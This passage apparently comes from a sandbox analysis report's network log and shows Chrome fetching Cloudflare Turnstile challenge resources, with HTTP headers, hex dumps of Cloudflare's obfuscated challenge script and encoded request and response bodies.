                                        2024-12-17 14:45:59 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                        2024-12-17 14:45:59 UTC1369INData Raw: 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25
                                        Data Ascii: ","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_feedback_report":"Having%
                                        2024-12-17 14:45:59 UTC1369INData Raw: 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 61 2c 67 62 2c 67 68 2c 67 69 2c 67 66 2c 67 67 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 37 35 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 35 32 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 37 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 34 39 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 36 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 39 31 34 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 38 37 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49
                                        Data Ascii: ,g3,g4,g5,g6,ga,gb,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1675))/1+parseInt(gI(1852))/2+-parseInt(gI(517))/3*(parseInt(gI(749))/4)+-parseInt(gI(1286))/5*(parseInt(gI(914))/6)+-parseInt(gI(687))/7*(parseInt(gI
                                        2024-12-17 14:45:59 UTC1369INData Raw: 29 2c 27 43 73 45 49 56 27 3a 68 6a 28 31 32 30 38 29 2c 27 4b 75 6e 79 54 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2a 67 7d 7d 2c 64 3d 31 2c 65 3d 63 5b 68 6a 28 31 33 34 38 29 5d 28 31 65 33 2c 65 4d 5b 68 6a 28 37 35 32 29 5d 5b 68 6a 28 36 32 38 29 5d 28 32 2e 38 32 3c 3c 64 2c 33 32 29 29 2c 65 4d 5b 68 6a 28 31 36 36 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 6b 2c 67 2c 68 29 7b 28 68 6b 3d 68 6a 2c 65 4d 5b 68 6b 28 38 36 38 29 5d 29 26 26 28 68 6b 28 31 33 30 37 29 21 3d 3d 68 6b 28 35 30 35 29 3f 28 65 4d 5b 68 6b 28 31 35 33 31 29 5d 5b 68 6b 28 31 36 39 38 29 5d 28 29 2c 65 4d 5b 68 6b 28 31 35 33 31 29 5d 5b 68 6b 28 38 37 35 29 5d 28 29 2c 65 4d 5b 68 6b 28 35 38 35 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 63 5b 68 6b
                                        Data Ascii: ),'CsEIV':hj(1208),'KunyT':function(f,g){return f*g}},d=1,e=c[hj(1348)](1e3,eM[hj(752)][hj(628)](2.82<<d,32)),eM[hj(1660)](function(hk,g,h){(hk=hj,eM[hk(868)])&&(hk(1307)!==hk(505)?(eM[hk(1531)][hk(1698)](),eM[hk(1531)][hk(875)](),eM[hk(585)]=!![],eM[c[hk
                                        2024-12-17 14:45:59 UTC1369INData Raw: 65 74 75 72 6e 3b 43 3d 6b 5b 68 6d 28 37 39 31 29 5d 2c 42 5b 68 6d 28 31 38 37 38 29 5d 28 43 2c 6f 2c 21 21 5b 5d 29 2c 42 5b 68 6d 28 31 35 31 36 29 5d 3d 35 65 33 2c 42 5b 68 6d 28 39 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 42 5b 68 6d 28 36 30 32 29 5d 28 68 6d 28 31 34 32 36 29 2c 68 6d 28 38 36 30 29 29 2c 44 3d 7b 7d 2c 44 5b 68 6d 28 31 33 30 32 29 5d 3d 67 2c 44 5b 68 6d 28 31 30 38 37 29 5d 3d 6c 2c 44 2e 63 63 3d 68 2c 44 5b 68 6d 28 31 33 38 39 29 5d 3d 6d 2c 44 5b 68 6d 28 31 38 35 37 29 5d 3d 78 2c 45 3d 4a 53 4f 4e 5b 68 6d 28 36 30 31 29 5d 28 44 29 2c 46 3d 67 34 5b 68 6d 28 36 35 32 29 5d 28 45 29 5b 68 6d 28 31 32 30 31 29 5d 28 27 2b 27 2c 68 6d 28 31 38 33 34 29 29 2c 42 5b 68 6d 28 31 35 37 30 29 5d 28 27 76 5f 27 2b
                                        Data Ascii: eturn;C=k[hm(791)],B[hm(1878)](C,o,!![]),B[hm(1516)]=5e3,B[hm(935)]=function(){},B[hm(602)](hm(1426),hm(860)),D={},D[hm(1302)]=g,D[hm(1087)]=l,D.cc=h,D[hm(1389)]=m,D[hm(1857)]=x,E=JSON[hm(601)](D),F=g4[hm(652)](E)[hm(1201)]('+',hm(1834)),B[hm(1570)]('v_'+
                                        2024-12-17 14:45:59 UTC1369INData Raw: 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 70 28 31 30 35 32 29 5d 5b 68 70 28 39 34 38 29 5d 28 6b 5b 68 70 28 34 39 37 29 5d 2c 65 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 31 3d 30 2c 66 34 3d 7b 7d 2c 66 34 5b 67 4a 28 31 30 37 39 29 5d 3d 66 33 2c 65 4d 5b 67 4a 28 31 37 33 30 29 5d 3d 66 34 2c 66 36 3d 65 4d 5b 67 4a 28 31 35 30 39 29 5d 5b 67 4a 28 31 32 34 33 29 5d 5b 67 4a 28 31 33 34 30 29 5d 2c 66 37 3d 65 4d 5b 67 4a 28 31 35 30 39 29 5d 5b 67 4a 28 31 32 34 33 29 5d 5b 67 4a 28 31 37 36 39 29 5d 2c 66 38 3d 65 4d 5b 67 4a 28 31 35 30 39 29 5d 5b 67 4a 28 31 32 34 33 29 5d 5b 67 4a 28 31 30 34 37 29 5d 2c 66 6b 3d 21 5b 5d 2c 66 77 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 31 35 34 32 29 5d 28 67 4a 28 31 34 33 34 29 2c 66 75 6e
                                        Data Ascii: )]()},1e3),eM[hp(1052)][hp(948)](k[hp(497)],e));return![]},f1=0,f4={},f4[gJ(1079)]=f3,eM[gJ(1730)]=f4,f6=eM[gJ(1509)][gJ(1243)][gJ(1340)],f7=eM[gJ(1509)][gJ(1243)][gJ(1769)],f8=eM[gJ(1509)][gJ(1243)][gJ(1047)],fk=![],fw=undefined,eM[gJ(1542)](gJ(1434),fun
                                        2024-12-17 14:45:59 UTC1369INData Raw: 39 29 5d 3d 66 49 2c 67 33 5b 67 4a 28 31 33 35 35 29 5d 3d 66 48 2c 67 33 5b 67 4a 28 37 36 35 29 5d 3d 66 47 2c 67 33 5b 67 4a 28 31 33 37 33 29 5d 3d 66 72 2c 67 33 5b 67 4a 28 35 36 37 29 5d 3d 67 32 2c 67 33 5b 67 4a 28 31 31 35 39 29 5d 3d 66 76 2c 67 33 5b 67 4a 28 31 36 39 38 29 5d 3d 66 73 2c 67 33 5b 67 4a 28 31 36 33 30 29 5d 3d 66 6f 2c 67 33 5b 67 4a 28 36 33 34 29 5d 3d 66 6e 2c 65 4d 5b 67 4a 28 31 35 33 31 29 5d 3d 67 33 2c 67 34 3d 66 75 6e 63 74 69 6f 6e 28 69 4d 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 4d 3d 67 4a 2c 64 3d 7b 27 7a 6b 74 41 7a 27 3a 69 4d 28 31 35 32 35 29 2c 27 55 75 78 7a 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 74 76 6f 52 50 27 3a 66 75 6e 63 74 69 6f 6e
                                        Data Ascii: 9)]=fI,g3[gJ(1355)]=fH,g3[gJ(765)]=fG,g3[gJ(1373)]=fr,g3[gJ(567)]=g2,g3[gJ(1159)]=fv,g3[gJ(1698)]=fs,g3[gJ(1630)]=fo,g3[gJ(634)]=fn,eM[gJ(1531)]=g3,g4=function(iM,d,e,f,g){return iM=gJ,d={'zktAz':iM(1525),'Uuxzy':function(h,i){return h>i},'tvoRP':function
                                        2024-12-17 14:45:59 UTC1369INData Raw: 79 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 64 6f 66 66 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4f 53 71 6c 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 47 79 54 64 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 76 43 6d 70 52 27 3a 69 4d 28 37 31 37 29 2c 27 62 59 71 5a 52 27 3a 69 4d 28 37 38 31 29 2c 27 53 49 51 61 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4d 75 66 67 44 27 3a 69 4d 28 38 31 37 29 2c 27 6e 4b 61 51 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 77
                                        Data Ascii: yZ':function(h,i){return h==i},'doffQ':function(h,i){return h<<i},'OSqlV':function(h,i){return i==h},'GyTdg':function(h,i){return i==h},'vCmpR':iM(717),'bYqZR':iM(781),'SIQaC':function(h,i){return h(i)},'MufgD':iM(817),'nKaQy':function(h,i){return h+i},'w
                                        2024-12-17 14:45:59 UTC1369INData Raw: 4d 3b 65 6c 73 65 20 69 66 28 69 50 28 31 32 33 31 29 3d 3d 3d 69 50 28 31 32 33 31 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 69 50 28 31 32 31 33 29 5d 5b 69 50 28 38 38 31 29 5d 5b 69 50 28 31 31 33 30 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 69 50 28 31 33 30 33 29 5d 28 69 50 28 34 38 37 29 2c 69 50 28 31 35 36 34 29 29 29 72 65 74 75 72 6e 21 5b 5d 3b 65 6c 73 65 7b 69 66 28 64 5b 69 50 28 31 38 39 36 29 5d 28 32 35 36 2c 44 5b 69 50 28 31 36 33 34 29 5d 28 30 29 29 29 7b 69 66 28 69 50 28 31 36 36 33 29 21 3d 3d 69 50 28 31 37 34 38 29 29 7b 66 6f 72 28 78 3d 30 3b 64 5b 69 50 28 36 37 31 29 5d 28 78 2c 47 29 3b 49 3c 3c 3d 31 2c 64 5b 69 50 28 31 35 32 38 29 5d 28 4a 2c 64 5b 69 50 28 31 33 32 34 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 50
                                        Data Ascii: M;else if(iP(1231)===iP(1231)){if(Object[iP(1213)][iP(881)][iP(1130)](C,D)){if(d[iP(1303)](iP(487),iP(1564)))return![];else{if(d[iP(1896)](256,D[iP(1634)](0))){if(iP(1663)!==iP(1748)){for(x=0;d[iP(671)](x,G);I<<=1,d[iP(1528)](J,d[iP(1324)](j,1))?(J=0,H[iP
                                        2024-12-17 14:45:59 UTC1369INData Raw: 30 37 29 5d 28 78 2c 47 29 3b 49 3c 3c 3d 31 2c 4a 3d 3d 64 5b 69 50 28 31 33 32 34 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 69 50 28 38 36 35 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 50 28 31 36 33 34 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 64 5b 69 50 28 31 38 30 34 29 5d 28 64 5b 69 50 28 35 35 31 29 5d 28 49 2c 31 29 2c 4e 26 31 2e 33 35 29 2c 64 5b 69 50 28 31 38 30 33 29 5d 28 4a 2c 64 5b 69 50 28 36 36 36 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 50 28 38 36 35 29 5d 28 64 5b 69 50 28 31 35 36 31 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 50 28 31 38
                                        Data Ascii: 07)](x,G);I<<=1,J==d[iP(1324)](j,1)?(J=0,H[iP(865)](o(I)),I=0):J++,x++);for(N=D[iP(1634)](0),x=0;8>x;I=d[iP(1804)](d[iP(551)](I,1),N&1.35),d[iP(1803)](J,d[iP(666)](j,1))?(J=0,H[iP(865)](d[iP(1561)](o,I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=d[iP(18


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.1749714104.18.94.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:59 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:59 UTC240INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:45:59 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        cache-control: max-age=2629800, public
                                        Server: cloudflare
                                        CF-RAY: 8f37b33819cc41d2-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:45:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.1749715104.18.95.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:45:59 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/336816551:1734444914:H7AwvCHEDObeSZScAcpjc5TTruO7fZKfwv33awfQW9E/8f37b31c6b081a48/hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdX HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 3492
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdX
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:45:59 UTC3492OUTData Raw: 76 5f 38 66 33 37 62 33 31 63 36 62 30 38 31 61 34 38 3d 48 75 36 4d 66 4d 30 4d 67 4d 43 4d 79 4d 6c 38 42 4e 38 42 52 39 74 52 74 45 24 46 74 24 42 74 39 7a 45 64 71 75 6b 41 42 65 7a 42 68 4b 4d 74 6e 74 67 42 64 41 6f 52 59 41 50 53 75 74 33 42 2d 39 74 31 42 68 38 41 42 78 65 4d 74 66 4a 42 79 68 75 42 70 6e 79 41 24 2d 42 68 41 74 43 2d 4d 31 39 6b 38 42 24 4d 74 62 42 48 4d 30 64 57 45 49 64 76 37 37 25 32 62 42 31 75 53 36 34 78 4c 76 41 78 38 6d 56 73 64 5a 70 41 42 6e 41 30 4c 42 74 36 7a 38 37 32 59 37 78 6b 42 6c 38 78 46 58 7a 2d 65 30 58 2d 4a 38 57 53 45 33 48 68 41 48 42 74 78 74 48 53 6b 42 4f 36 42 6b 38 7a 42 2b 4d 30 4b 42 59 36 42 63 50 4d 42 39 50 4d 52 42 6f 75 7a 62 66 57 41 65 58 42 42 53 38 30 65 57 41 42 53 31 58 39 42 65 4d 4d
                                        Data Ascii: v_8f37b31c6b081a48=Hu6MfM0MgMCMyMl8BN8BR9tRtE$Ft$Bt9zEdqukABezBhKMtntgBdAoRYAPSut3B-9t1Bh8ABxeMtfJByhuBpnyA$-BhAtC-M19k8B$MtbBHM0dWEIdv77%2bB1uS64xLvAx8mVsdZpABnA0LBt6z872Y7xkBl8xFXz-e0X-J8WSE3HhAHBtxtHSkBO6Bk8zB+M0KBY6BcPMB9PMRBouzbfWAeXBBS80eWABS1X9BeMM
                                        2024-12-17 14:46:00 UTC779INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:00 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 152460
                                        Connection: close
                                        cf-chl-gen: bwhSdk9SMOtuffUGDnhgKrM2iokbCI1b2wZszWeD8CgqX/7zD+30i/1ZladPi660GQDVp7KgIZpX5GlwJPHG4vo5KRYAVwapk5jrl/c3yZp4/DzscXRA//v6Kwq+A2bvZJyZ6hRecvuOIzRzRwOW826TZPt4JA3obvpgZmvcFvbwBBCoro0AK4CRn7eVbXnEE0vGH2y8aW6TIFEb7srs4/Bhward3VQYvAFXt37K08LSrycK/BNc5lWti5xR2vgZJ4spF6oI8orB+gqQhBQ4W6ieUDGsOLlDQqT3TuJYTrYQkH0EWWndTWieXOyp39Y7EvNIqYpw9cBnnXp/UbOoIkR7Uoy1faoWvh8PCV54B3SZ4ysj83OLg/Rlt38SsoC/DxfIeJHUx10wu2TIZk4JD5iPMx0j6iHzWXVQcSkvzQ7Bc/0W4gtwGj5AfkO9KZM4/F9shV8U/eM6oM920QiS+3CT/fVgaQPsYIfdA77OhByywGpbUk+FjXGUOcdy9eORPvjrwrbayOVQ59eB$RSIurc8nl1hJ6qpo
                                        Server: cloudflare
                                        CF-RAY: 8f37b338fb0b8ccc-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:46:00 UTC590INData Raw: 54 4a 42 51 66 6c 46 53 69 55 2b 54 61 32 61 45 62 48 57 4b 6b 4a 32 49 64 35 71 64 64 70 70 76 68 5a 53 6d 6d 48 31 6a 68 71 57 4e 66 61 42 70 69 49 61 46 63 59 47 6c 6a 36 65 76 64 33 71 78 66 6f 79 74 6f 37 75 33 6d 59 4f 57 74 35 57 6e 69 4a 53 68 7a 38 2b 77 75 5a 2f 44 7a 4b 6a 44 77 72 58 4d 31 4d 37 57 79 71 2b 5a 32 72 6a 4f 34 61 53 77 74 5a 2b 79 70 64 66 4d 7a 61 66 66 71 62 44 79 34 36 32 30 37 74 53 79 75 4e 44 55 2f 4f 7a 54 31 2f 72 79 37 37 6a 55 7a 66 6a 4f 35 76 58 69 35 66 54 49 43 2b 76 4b 2f 4f 54 66 7a 67 48 67 39 52 54 68 2b 50 76 55 47 42 72 72 38 66 54 65 43 77 77 59 37 66 58 6e 41 68 73 45 2f 69 77 66 4c 43 6f 70 48 69 73 74 48 54 59 73 4c 66 55 51 4c 54 6b 77 4e 77 38 31 44 7a 30 52 4f 53 50 33 46 69 63 55 50 42 63 44 49 52 63
                                        Data Ascii: TJBQflFSiU+Ta2aEbHWKkJ2Id5qddppvhZSmmH1jhqWNfaBpiIaFcYGlj6evd3qxfoyto7u3mYOWt5WniJShz8+wuZ/DzKjDwrXM1M7Wyq+Z2rjO4aSwtZ+ypdfMzaffqbDy46207tSyuNDU/OzT1/ry77jUzfjO5vXi5fTIC+vK/OTfzgHg9RTh+PvUGBrr8fTeCwwY7fXnAhsE/iwfLCopHistHTYsLfUQLTkwNw81Dz0ROSP3FicUPBcDIRc
                                        2024-12-17 14:46:00 UTC1369INData Raw: 67 44 54 45 51 70 45 43 31 41 44 69 45 67 48 69 73 32 4a 55 70 4a 45 31 70 50 4e 53 31 57 58 69 39 6a 47 32 46 6e 53 45 6f 6f 50 31 30 32 61 79 6b 34 62 56 78 46 63 57 74 4a 55 54 68 32 63 6b 31 33 56 6c 4d 34 57 6e 4e 78 53 31 73 38 52 6d 42 6c 64 57 69 48 5a 6f 4f 50 64 34 74 78 58 46 74 72 6b 5a 47 49 68 6d 46 71 5a 5a 4a 58 64 70 53 4e 6d 6e 61 54 65 70 61 42 68 47 4b 67 65 4b 6d 74 64 57 65 43 65 6f 6d 46 67 34 4a 6e 6f 4a 69 71 72 34 36 62 65 70 65 38 73 61 47 4a 6f 71 53 51 74 6f 57 62 78 4a 6a 43 75 37 75 6a 6a 5a 2b 4a 71 70 36 2f 6a 59 75 73 77 71 75 30 70 62 76 63 6b 36 65 6e 6d 75 44 59 6f 4e 4c 56 78 75 4c 6b 73 64 2f 49 37 62 37 76 35 37 72 62 77 2b 75 74 38 73 4c 75 38 4f 48 4c 35 36 37 4b 31 4e 72 61 39 39 48 51 30 76 37 54 77 38 58 58 34
                                        Data Ascii: gDTEQpEC1ADiEgHis2JUpJE1pPNS1WXi9jG2FnSEooP102ayk4bVxFcWtJUTh2ck13VlM4WnNxS1s8RmBldWiHZoOPd4txXFtrkZGIhmFqZZJXdpSNmnaTepaBhGKgeKmtdWeCeomFg4JnoJiqr46bepe8saGJoqSQtoWbxJjCu7ujjZ+Jqp6/jYuswqu0pbvck6enmuDYoNLVxuLksd/I7b7v57rbw+ut8sLu8OHL567K1Nra99HQ0v7Tw8XX4
                                        2024-12-17 14:46:00 UTC1369INData Raw: 49 4b 42 51 56 54 31 67 53 44 31 6b 71 55 54 78 61 58 44 30 79 47 6c 59 32 55 53 41 6d 4a 31 73 37 50 43 6b 32 4f 32 56 62 61 6c 74 6f 51 32 31 54 57 44 5a 47 5a 6e 42 54 56 57 69 41 63 59 4a 64 51 6d 4e 35 5a 6c 52 62 59 6e 4b 4c 57 58 74 6a 68 33 47 4f 53 6f 56 77 69 45 31 76 64 70 68 6b 6c 6c 74 77 58 5a 79 4b 6b 33 43 66 59 32 52 2b 6f 5a 4b 46 5a 36 68 72 71 48 71 71 6d 6e 36 65 72 58 4f 67 72 4c 4f 69 63 62 71 32 65 35 4f 53 76 4b 71 31 6d 6e 71 77 77 4c 75 62 68 73 69 39 6d 6f 57 33 69 62 79 78 69 71 53 77 77 73 71 2f 6a 73 61 54 78 64 44 45 6e 62 75 57 72 4c 62 62 76 63 58 65 6e 70 37 53 75 73 61 37 35 4d 61 35 7a 2b 44 67 79 39 54 50 70 38 48 69 35 50 50 6d 31 76 47 34 2f 4e 7a 62 39 74 54 6b 34 74 6a 32 78 73 44 67 77 62 30 45 35 63 54 33 34 77
                                        Data Ascii: IKBQVT1gSD1kqUTxaXD0yGlY2USAmJ1s7PCk2O2VbaltoQ21TWDZGZnBTVWiAcYJdQmN5ZlRbYnKLWXtjh3GOSoVwiE1vdphklltwXZyKk3CfY2R+oZKFZ6hrqHqqmn6erXOgrLOicbq2e5OSvKq1mnqwwLubhsi9moW3ibyxiqSwwsq/jsaTxdDEnbuWrLbbvcXenp7Susa75Ma5z+Dgy9TPp8Hi5PPm1vG4/Nzb9tTk4tj2xsDgwb0E5cT34w
                                        2024-12-17 14:46:00 UTC1369INData Raw: 52 68 49 79 52 7a 46 4d 53 6c 64 55 53 32 42 42 4e 79 34 6d 4d 54 4e 71 51 55 46 4f 53 31 70 52 62 30 4e 6f 58 6d 42 6e 55 32 6c 36 57 30 59 36 55 56 42 32 4f 34 41 37 63 59 55 39 50 6e 56 55 52 55 6c 37 61 58 69 50 66 6b 61 41 6b 6f 4b 53 69 4a 57 47 68 33 5a 58 68 57 56 55 61 33 4a 36 6c 48 42 34 6e 6e 4e 32 5a 70 65 55 70 4a 70 35 5a 49 79 45 6a 35 79 6f 73 4a 35 78 6f 4c 53 70 67 61 5a 31 72 72 36 57 72 33 68 2b 67 59 32 52 6b 63 47 2f 75 6e 2b 49 73 34 61 57 72 4a 75 6d 6a 62 33 4a 6a 4c 53 30 6f 61 76 59 73 4a 69 73 33 61 6e 4b 71 4c 79 68 33 72 4f 37 34 39 37 6e 73 64 79 68 35 71 54 66 71 37 7a 4d 35 36 76 46 34 39 4f 75 37 76 62 51 79 65 65 30 74 4d 7a 4f 39 76 4c 50 7a 67 66 6c 7a 77 69 37 32 75 44 69 31 67 33 34 78 73 30 4d 42 64 54 53 44 67 63
                                        Data Ascii: RhIyRzFMSldUS2BBNy4mMTNqQUFOS1pRb0NoXmBnU2l6W0Y6UVB2O4A7cYU9PnVURUl7aXiPfkaAkoKSiJWGh3ZXhWVUa3J6lHB4nnN2ZpeUpJp5ZIyEj5yosJ5xoLSpgaZ1rr6Wr3h+gY2RkcG/un+Is4aWrJumjb3JjLS0oavYsJis3anKqLyh3rO7497nsdyh5qTfq7zM56vF49Ou7vbQyee0tMzO9vLPzgflzwi72uDi1g34xs0MBdTSDgc
